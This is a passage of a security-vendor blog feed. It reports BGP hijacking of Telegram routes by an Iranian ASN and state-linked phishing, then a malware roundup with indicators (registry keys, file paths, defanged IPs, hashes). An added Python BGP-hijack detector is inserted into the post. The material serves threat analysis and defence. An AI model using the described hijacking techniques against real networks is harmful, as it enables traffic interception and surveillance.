Through analyzing pDNS records, Talos discovered additional domains that resolved to the same IP address.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-BgOet58G7eA/W-Bv46bv0jI/AAAAAAAAAVE/ldP5hAt3fCUOkbnXCfFhaGaFKzlpK4MxACK4BGAYYCw/s1600/Screenshot%2B2018-11-05%2Bat%2B16.28.50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://1.bp.blogspot.com/-BgOet58G7eA/W-Bv46bv0jI/AAAAAAAAAVE/ldP5hAt3fCUOkbnXCfFhaGaFKzlpK4MxACK4BGAYYCw/s640/Screenshot%2B2018-11-05%2Bat%2B16.28.50.png" width="544" /></a></div><br />This clearly demonstrates that this group has ongoing activity with a focus on user credentials and messaging applications.<br /><h3 id="h.w235n7h1ral7">BGP Routing Anomalies</h3><div><br /></div><h4 id="h.2hkb43m8cthf">Background</h4><div><br /></div><div style="text-align: left;">While monitoring <a href="https://bgpstream.com/">BGPStream</a>, Cisco's database of Border Gateway Protocol (BGP) announcements, Talos noticed some routing anomalies originating from the Iran-based autonomous system number (ASN) 58224. For those unfamiliar with this protocol, BGP is defined in <a href="https://tools.ietf.org/html/rfc4271">Request for Comments (RFC) 4271</a> as "an inter-Autonomous System routing protocol." In this context, "a route is defined as a unit of information that pairs a set of destinations with the attributes of a path to those destinations." In short, this protocol allows internet communications to occur when a resource located outside of the requesting network or autonomous system is requested.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">BGP is used across the internet to select the best path for routing traffic. It's important to note that this selection can be influenced at the ISP level, since BGP allows route selection to depend on various factors. 
BGP optimizes the routing of internet traffic through the speaking system, which RFC 4271 defines as:</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The primary function of a BGP speaking system is to exchange network reachability information with other BGP systems. This network reachability information includes information on the list of Autonomous Systems (ASes) that reachability information traverses.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">These speaking systems serve as a platform for routers to send out "update messages" to neighboring systems. The process for "changing the attribute(s) of a route is accomplished by advertising a replacement route. The replacement route carries new [changed] attributes and has the same address prefix as the original route."</div><div style="text-align: left;"><br /></div><div style="text-align: left;">While this was designed as a feature to combat networking issues, no adequate security mechanism was added to prevent it from being abused. BGP offers no security mechanism other than optional methods such as MD5 passwords for neighbours, IPsec or GTSM. None of these are default requirements, and as such they are not necessarily widely used. This could allow someone to send out an update message with an alternate route to the same prefix or AS, even if there was no issue with the primary route.&nbsp;</div><div style="text-align: left;"><br /></div><div style="text-align: left;">This could result in some traffic passing through a predetermined, or sub-optimal, route for the victim. These routing deviations are sometimes referred to as BGP hijacking sessions. The effectiveness of a BGP hijacking session is measured by the number of BGP peers that receive the update message. 
The more peers that receive the update message, the more likely it is that traffic is being routed through the alternative, sub-optimal path pre-configured by the actor.<br /><br /></div><h4 id="h.hgpgr86j12g2">Pre-Planned Routing Activity from ASN 58224</h4><div><br /></div><div style="text-align: left;">One interesting <a href="https://bgpstream.com/event/141474">BGP routing anomaly</a> occurred on June 30, 2018 at 07:41:28 UTC. During this event, the Iran-based ASN 58224 announced an update for the prefix 185.112.156.0/22. The Iranian telecommunications provider Iran Telecommunication Company PJS owned the ASN that sent out the update message.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The range potentially being hijacked was associated with the Hungarian-based internet service provider (ISP) DoclerWeb Kft. Nine BGPmon peers detected this event, and it lasted for two hours and 15 minutes until a new update message was disseminated. While this event was quite small in scale, it could have been a trial run for a larger BGP hijack attempt.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-WLFKfZHbMzk/W-BvO7z4UhI/AAAAAAAAAUs/4pt7id0NgOs36YlTrKV5C4WhE7bTrahDgCK4BGAYYCw/s1600/Screenshot%2B2018-11-05%2Bat%2B16.26.15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="102" src="https://2.bp.blogspot.com/-WLFKfZHbMzk/W-BvO7z4UhI/AAAAAAAAAUs/4pt7id0NgOs36YlTrKV5C4WhE7bTrahDgCK4BGAYYCw/s640/Screenshot%2B2018-11-05%2Bat%2B16.26.15.png" width="640" /></a></div><br /><div style="text-align: left;">There were more significant BGP anomalies that originated from that same Iran-based ASN 58224. On July 30, 2018 at 06:28:25 UTC, four BGP routes were announced as being "more specific" at the exact same time, down to the second, impacting communications with Telegram. 
When routers received this update message through the speaking system, they began routing some traffic destined for the Telegram servers through ASN 58224. This campaign proved to be particularly effective, since a large number of BGPmon peers observed it, suggesting that it propagated throughout the region via the speaking system. Just like the event one month prior, all routers received a corrected update message two hours and 15 minutes later, ending the hijack.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-DiJ0fsLWFbM/W-BvgYuudtI/AAAAAAAAAU4/1htDyX4oSw82rmSPBLjKzeZmi0M28P8eACK4BGAYYCw/s1600/Screenshot%2B2018-11-05%2Bat%2B16.27.22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://2.bp.blogspot.com/-DiJ0fsLWFbM/W-BvgYuudtI/AAAAAAAAAU4/1htDyX4oSw82rmSPBLjKzeZmi0M28P8eACK4BGAYYCw/s640/Screenshot%2B2018-11-05%2Bat%2B16.27.22.png" width="640" /></a></div><h4 id="h.7efj4xv6jsui">How BGP Hijacking could have enabled computer network operations</h4><div><br /></div><div style="text-align: left;">Theoretically, this announcement could have been one component of an operation to compromise communications with Telegram servers. This hijacking session led to some Telegram messages being sent to an Iranian telecommunications provider. Other nation-state actors have used this technique in order to deliver malware, as <a href="https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/">documented by other security researchers</a>, two months prior in May 2018. Once the traffic is routed through a desired ISP, it could be subject to modification and inspection. 
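<br /><br />As an added illustration of the origin-mismatch and "more specific" checks a BGPmon-style monitor applies to events like the ones above (example code written for this post, not Talos or BGPStream code): it replays the June 30 announcement of 185.112.156.0/22 by AS58224 with the timings given above, plus a constructed more-specific announcement of a watched range, and times each event until the corrected update arrives. The expected-origin ASNs 64496 and 64497 and the 203.0.113.0/24 and 198.51.100.0/24 prefixes are placeholders, since the page does not list the legitimate origin ASN or Telegram's ranges.

```python
"""Flag BGP UPDATEs that equal or are more specific than a monitored prefix
but carry an unexpected origin ASN, then time each event until it is corrected.

Added example, not code from Talos or BGPStream/BGPmon. ASNs 64496/64497 and
the prefixes other than 185.112.156.0/22 are constructed placeholders."""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from ipaddress import IPv4Network, ip_network
from typing import Dict, List, Optional

UTC = timezone.utc


@dataclass(frozen=True)
class Announcement:
    seen_at: datetime
    prefix: IPv4Network
    origin_asn: Optional[int]      # None means the prefix was withdrawn


@dataclass
class HijackEvent:
    monitored: IPv4Network         # prefix we watch
    announced: IPv4Network         # prefix actually announced
    hijacker_asn: int
    started: datetime
    ended: Optional[datetime] = None

    @property
    def more_specific(self) -> bool:
        """True when the bogus route is longer than the monitored prefix and so
        wins longest-prefix matching on every router that accepts it."""
        return self.announced.prefixlen > self.monitored.prefixlen

    @property
    def duration(self) -> Optional[timedelta]:
        return None if self.ended is None else self.ended - self.started


def covering_prefix(prefix: IPv4Network,
                    monitored: Dict[IPv4Network, int]) -> Optional[IPv4Network]:
    """Longest monitored prefix that contains `prefix` (or equals it), else None."""
    hits = [m for m in monitored if prefix.subnet_of(m)]
    return max(hits, key=lambda m: m.prefixlen) if hits else None


def detect_hijacks(feed: List[Announcement],
                   expected_origins: Dict[IPv4Network, int]) -> List[HijackEvent]:
    """Walk the feed in time order: open an event on an origin mismatch, close it
    when that prefix is withdrawn or re-announced by the expected origin."""
    open_events: Dict[IPv4Network, HijackEvent] = {}
    events: List[HijackEvent] = []
    for ann in sorted(feed, key=lambda a: a.seen_at):
        monitored = covering_prefix(ann.prefix, expected_origins)
        if monitored is None:
            continue                                   # not a prefix we watch
        legit = expected_origins[monitored]
        if ann.origin_asn is not None and ann.origin_asn != legit:
            if ann.prefix not in open_events:          # first sighting of this hijack
                ev = HijackEvent(monitored, ann.prefix, ann.origin_asn, ann.seen_at)
                open_events[ann.prefix] = ev
                events.append(ev)
        else:                                          # withdrawal or legitimate origin
            ev = open_events.pop(ann.prefix, None)
            if ev is not None:
                ev.ended = ann.seen_at
    return events


# Constructed sample feed: the June 30 /22 event with the timings from the post,
# and a stand-in "more specific" announcement of a watched range.
EXPECTED_ORIGINS = {
    ip_network("185.112.156.0/22"): 64496,   # placeholder for the Hungarian ISP's ASN
    ip_network("203.0.113.0/24"): 64497,     # TEST-NET-3 standing in for a Telegram range
}

SAMPLE_FEED = [
    Announcement(datetime(2018, 6, 30, 7, 0, 0, tzinfo=UTC), ip_network("185.112.156.0/22"), 64496),
    Announcement(datetime(2018, 6, 30, 7, 41, 28, tzinfo=UTC), ip_network("185.112.156.0/22"), 58224),
    Announcement(datetime(2018, 6, 30, 9, 56, 28, tzinfo=UTC), ip_network("185.112.156.0/22"), 64496),
    Announcement(datetime(2018, 7, 30, 6, 28, 25, tzinfo=UTC), ip_network("203.0.113.0/25"), 58224),
    Announcement(datetime(2018, 7, 30, 6, 28, 25, tzinfo=UTC), ip_network("198.51.100.0/24"), 58224),  # unwatched
    Announcement(datetime(2018, 7, 30, 8, 43, 25, tzinfo=UTC), ip_network("203.0.113.0/25"), None),
]


def run_sample() -> List[HijackEvent]:
    return detect_hijacks(SAMPLE_FEED, EXPECTED_ORIGINS)


if __name__ == "__main__":
    for ev in run_sample():
        kind = "more-specific" if ev.more_specific else "exact-prefix"
        print(f"{ev.started:%Y-%m-%d %H:%M:%S} {ev.announced} by AS{ev.hijacker_asn} "
              f"({kind} hijack of {ev.monitored}), lasted {ev.duration}")
```

The unwatched 198.51.100.0/24 announcement is deliberately ignored, so an origin mismatch alone never fires without a matching monitored prefix.<br /><br />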
There has been <a href="https://www.reuters.com/article/us-iran-cyber-telegram-exclusive/exclusive-hackers-accessed-telegram-messaging-accounts-in-iran-researchers-idUSKCN10D1AM">open-source reporting</a> that suggests that Iran-based telecommunication providers have previously cooperated with Iranian government requests to obtain communications. The article suggests telecommunications companies provided government officials with the Telegram SMS verification codes needed to gain access to Telegram accounts.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">This particular capability would be attractive, since it could allow the actors to route traffic in neighboring ASNs through Iran. This could allow the threat actors to gain access to devices in nearby countries and compromise users who utilized non-Iranian telecommunications providers.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The Iranian Minister of Information and Communications Technology, Mohammad-Javad Azari Jahromi, acknowledged this event and stated it <a href="https://en.mehrnews.com/news/136252/Minster-orders-investigation-into-data-hijacking-charges-against">will be investigated</a>. Nothing further has been publicly released regarding this investigation from the Iranian government.<br /><br /></div><h2 id="h.f8y50rc42e8x">Conclusions</h2><div><br /></div><div style="text-align: left;">The three techniques we discussed here are not the only ones that state-sponsored actors can use to deploy surveillance mechanisms targeting their citizens. The topic of mass internet firewalling and surveillance deployment has been in the news before. Some of these campaigns have also targeted specific applications, such as Telegram. However, these apparently unrelated events all share at least two common denominators: Iran and Telegram. These denominators should be far apart, since Iran has banned Telegram in the country. 
But we found that there are several Telegram clones with several thousand installations that somehow contact IP addresses located in Iran, some of which advertise the fact that they can circumvent the ban. The activity of these applications is not illegal, but it gives their operators total control over the messaging applications and, to some extent, users' devices.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The long-lasting activity of groups like Charming Kitten, even while using classic phishing techniques, is still effective against users who aren't very aware of cybersecurity. Given that the common denominator of all of these activities was citizenship, it is understandable that the vast majority of any country's population won't be as cybersecurity-educated as a cybersecurity professional, so even this classic technique could be highly effective.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">While it is impossible for Talos to precisely determine the intent behind the July 30 routing update messages, Talos assesses with moderate confidence that the updates were a deliberate act targeting Telegram-based services in the region. It is unlikely for four update messages to be distributed at the exact same time, routing two different Telegram ranges through four different subnets all associated with one ASN: 58224. 
This assessment statement also considers open-source reporting on Iran's complicated history with Telegram from <a href="https://www.nytimes.com/2018/05/01/world/middleeast/iran-telegram-app-russia.html">passing laws banning the use of Telegram</a>, to reports of outages resulting from <a href="https://twitter.com/InternetIntel/status/991334539388772353">Telegram's IP addresses being blocked in Iran</a>.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Aside from the victims and the applications, Talos was unable to find any solid link between each of these events. This investigation was focused on Iran due to the current ban on Telegram. However, these techniques could be used by any malicious actor, with or without state sponsorship. Talos assesses with high confidence that the users' privacy is at risk when using the applications discussed in this blog post. The overall security concerns should be taken seriously.</div><br /><h2 id="h.74u4v57c40ly">IOC</h2><h3 id="h.4xfjomnifxgc">Domains</h3><h3 id="h.lwnbzsfmirej">Hash values</h3>8ecf5161af04d2bf14020500997afa4473f6a137e8f45a99e323fb2157f1c984 - BitGram<br />24a545778b72132713bd7e0302a650ca9cc69262aa5b9e926633a0e1fc555e98 - AseGram<br />a2cf315d4d6c6794b680cb0e61afc5d0afb2c8f6b428ba8be560ab91e2e22c0d - followerbegir.ipa<br />a7609b6316b325cc8f98b186d46366e6eefaae101ee6ff660ecc6b9e90146a86 - ozvdarozv.apk<br /></div>2018-11-06T09:18:14.822-05:000https://blog.talosintelligence.com/2018/11/persian-stalker.htmlThreat Roundup for Oct. 26 to Nov. 2http://feedproxy.google.com/~r/feedburner/Talos/~3/P0-b_jT0_Oo/threat-roundup-1019-1102.htmlAMPCoverageThreat RoundupThreatGridUmbrellanoreply@blogger.com (William Largent)Fri, 02 Nov 2018 11:03:00 PDTtag:blogger.com,1999:blog-1029833275466591797.post-9166487153045093229<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABU/LKehnkoxdbQOVRk2Nl5tvFBv3ogo-VzogCPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" 
src="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABU/LKehnkoxdbQOVRk2Nl5tvFBv3ogo-VzogCPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" /></a></div><br /></div>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 26 and Nov. 02. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.<br /><br />As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.<br /><a name='more'></a><br />You can find an additional <a href="https://alln-extcloud-storage.cisco.com/ciscoblogs/5bdc8f23c0373.txt">JSON file here</a> that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. 
As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.<br /><br />The most prevalent threats highlighted in this roundup are:<br /><br /><ul><li><b>Win.Malware.Zbot-6732674-0</b><br /> Malware<br /> Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.<br />&nbsp;</li><li><b>Win.Malware.Sivis-6734391-0</b><br /> Malware<br /> Sivis is a type of trojan that is usually downloaded from the internet and installed by unsuspecting users. This trojan variant also includes sandbox evasion logic. It has the ability to move numerous files to the Recycle Bin.<br />&nbsp;</li><li><b>Win.Malware.Explorerhijack-6734396-0</b><br /> Malware<br /> A hijacker could use this malware to change the user's browser home page, redirect the user to suspicious websites, and then lead them to advertisements and commercial content that generates pay-per-click revenue for its developers.<br />&nbsp;</li><li><b>Xls.Malware.Cwsp-6735643-0</b><br /> Malware<br /> This is an Excel-based downloader that uses PowerShell to retrieve the next stage of the malware executable. Microsoft Office displays a warning to the user before the payload actually gets activated.<br />&nbsp;</li><li><b>Win.Trojan.Mikey-6735890-0</b><br /> Trojan<br /> This cluster focuses on malware that creates a specific cluster so the malware can achieve persistence. The samples have anti-analysis tricks to complicate the analysis. This family is known for its plugin architecture and for its intense network activity. This week, Mikey used the AppWizard packaging system. It is based on common Microsoft code, using the Microsoft Foundation Classes (MFC) to start a simple application. 
Malicious programs use this packer to stage process hollowing and obfuscate the malicious code.<br />&nbsp;</li></ul><hr /><h2>Threats</h2><h3>Win.Malware.Zbot-6732674-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\software\Wow6432Node\microsoft\windows nt\currentversion\winlogon </li><li>&lt;HKLM&gt;\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON <ul><li>Value Name: userinit</li></ul></li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and/or directories created</b><br /><ul><li>%WinDir%\SysWOW64\ntos.exe</li></ul><b>File Hashes</b><br /><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-TvfnGbCq1iA/W9yKmNa1m3I/AAAAAAAABFY/Uegx6-jXu2Q8oXLgRUZqzXXv6oY-KZ7bACLcBGAs/s1600/0e12afb0ec9aca39a02927e158883994dc6110f83880b5075aebcaed8077ce36_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://3.bp.blogspot.com/-TvfnGbCq1iA/W9yKmNa1m3I/AAAAAAAABFY/Uegx6-jXu2Q8oXLgRUZqzXXv6oY-KZ7bACLcBGAs/s400/0e12afb0ec9aca39a02927e158883994dc6110f83880b5075aebcaed8077ce36_amp.png" width="400" /></a></div><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://4.bp.blogspot.com/-pxmUY7r-I3c/W9yKsJkAjSI/AAAAAAAABFc/751P7pVsQDs9G4wX6FY9exDwiJXHYsXWwCLcBGAs/s1600/03746100716d1a66312b69c03ba2166aab6075f24ca826197972bf30a117dadb_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="505" data-original-width="962" height="334" src="https://4.bp.blogspot.com/-pxmUY7r-I3c/W9yKsJkAjSI/AAAAAAAABFc/751P7pVsQDs9G4wX6FY9exDwiJXHYsXWwCLcBGAs/s640/03746100716d1a66312b69c03ba2166aab6075f24ca826197972bf30a117dadb_tg.png" width="640" /></a></div><br /><h3>Win.Malware.Sivis-6734391-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and/or directories created</b><br /><ul><li>\$Recycle.Bin\&lt;USER-SID&gt;\$RZ7KADN.txt</li><li>\$Recycle.Bin\&lt;USER-SID&gt;\$RYGDGS7.lnk</li><li>%AppData%\Mozilla\Firefox\Profiles\iv5rtgu3.default\key3.db</li></ul><b>File Hashes</b><br /><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a 
href="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-2og45oKVqNg/W9yK5AjAifI/AAAAAAAABFg/zkMkXrDd9HceW8vk1Ta1H3w-0VviPh-XQCLcBGAs/s1600/51a9bf24550ec6db0e383fbe1e9089558e1d1bd4e57c5d3678a95233efd59dab_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-2og45oKVqNg/W9yK5AjAifI/AAAAAAAABFg/zkMkXrDd9HceW8vk1Ta1H3w-0VviPh-XQCLcBGAs/s400/51a9bf24550ec6db0e383fbe1e9089558e1d1bd4e57c5d3678a95233efd59dab_amp.png" width="400" /></a></div><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-BiPNQSW1ZCA/W9yK-x4F47I/AAAAAAAABFo/Be8NxhIBH6kxyKDtj38nQEXh_4wePV5mACLcBGAs/s1600/32e5b6a36aa94734f0af2cc7d2235bbfeecc915fc0bc0bf46f385f238dc1b69d_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-BiPNQSW1ZCA/W9yK-x4F47I/AAAAAAAABFo/Be8NxhIBH6kxyKDtj38nQEXh_4wePV5mACLcBGAs/s640/32e5b6a36aa94734f0af2cc7d2235bbfeecc915fc0bc0bf46f385f238dc1b69d_tg.png" width="640" /></a></div><br /><br /><h3>Win.Malware.Explorerhijack-6734396-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKCU&gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SESSIONINFO\1\LogonSoundHasBeenPlayed </li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>103[.]235[.]47[.]123</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and/or directories created</b><br /><ul><li>%SystemDrive%\347749632.exe</li></ul><b>File Hashes</b><br /><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-h9mXzmt8d7o/W9yLNS-GtbI/AAAAAAAABFs/vYP5-x0mMwg1bBF4NqWpkJFO-LwoeMSpgCLcBGAs/s1600/fd047bf2512554e75ffe684d07d0cb5ee798409fb504e2db7a13b90cfc7070e0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" 
data-original-width="702" height="272" src="https://2.bp.blogspot.com/-h9mXzmt8d7o/W9yLNS-GtbI/AAAAAAAABFs/vYP5-x0mMwg1bBF4NqWpkJFO-LwoeMSpgCLcBGAs/s400/fd047bf2512554e75ffe684d07d0cb5ee798409fb504e2db7a13b90cfc7070e0_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-RGOh536OPxg/W9yLSV6Mg5I/AAAAAAAABFw/kvlZkKyV5-8Bac1n0B0nLJZrf7mMu6rTgCLcBGAs/s1600/0387a6fcadc71d0fd723b94049d312eb81752994f06d6e11a222c20c81d610a8_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-RGOh536OPxg/W9yLSV6Mg5I/AAAAAAAABFw/kvlZkKyV5-8Bac1n0B0nLJZrf7mMu6rTgCLcBGAs/s640/0387a6fcadc71d0fd723b94049d312eb81752994f06d6e11a222c20c81d610a8_tg.png" width="640" /></a></div><br /><h3>Xls.Malware.Cwsp-6735643-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>212[.]58[.]244[.]48</li><li>208[.]91[.]197[.]13</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>lalecitinadesoja[.]com</li><li>downloads[.]bbc[.]co[.]uk</li></ul><b>Files and/or directories created</b><br /><ul><li>%LocalAppData%\Temp\1ii4ushk.rdy.ps1</li><li>%LocalAppData%\Temp\i3iu3ax4.unx.psm1</li><li>%AppData%\23C.exe</li></ul><b>File Hashes</b><br /><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-TpEILP4aGVQ/W9yM6dpVQlI/AAAAAAAABGA/C0OtXw35DQAcdfZ4dMzNYKMEwd-CJ1kwwCLcBGAs/s1600/75a14beabec965f401a21c1809b7fe9563ced7366c863e78dd5c744516aea83d_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-TpEILP4aGVQ/W9yM6dpVQlI/AAAAAAAABGA/C0OtXw35DQAcdfZ4dMzNYKMEwd-CJ1kwwCLcBGAs/s400/75a14beabec965f401a21c1809b7fe9563ced7366c863e78dd5c744516aea83d_amp.png" width="400" /></a></div><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-kfHYHySD5PE/W9yM_wWFQvI/AAAAAAAABGE/xV9M_34Q5y4uEZz50fTsf9rOKCkIS_9CACLcBGAs/s1600/5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-kfHYHySD5PE/W9yM_wWFQvI/AAAAAAAABGE/xV9M_34Q5y4uEZz50fTsf9rOKCkIS_9CACLcBGAs/s640/5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br 
/><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-4fATIapaiuo/W9yNEmQofTI/AAAAAAAABGI/VZVAxZKPoBALwp5teSqJiBoLc5im099CQCLcBGAs/s1600/5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://4.bp.blogspot.com/-4fATIapaiuo/W9yNEmQofTI/AAAAAAAABGI/VZVAxZKPoBALwp5teSqJiBoLc5im099CQCLcBGAs/s640/5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-tA6vC5fR8Wg/W9yNHyg4tcI/AAAAAAAABGM/SQRvLKA1MJ4U_2S8dwL1z_DROqQ_kLg2QCLcBGAs/s1600/5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" 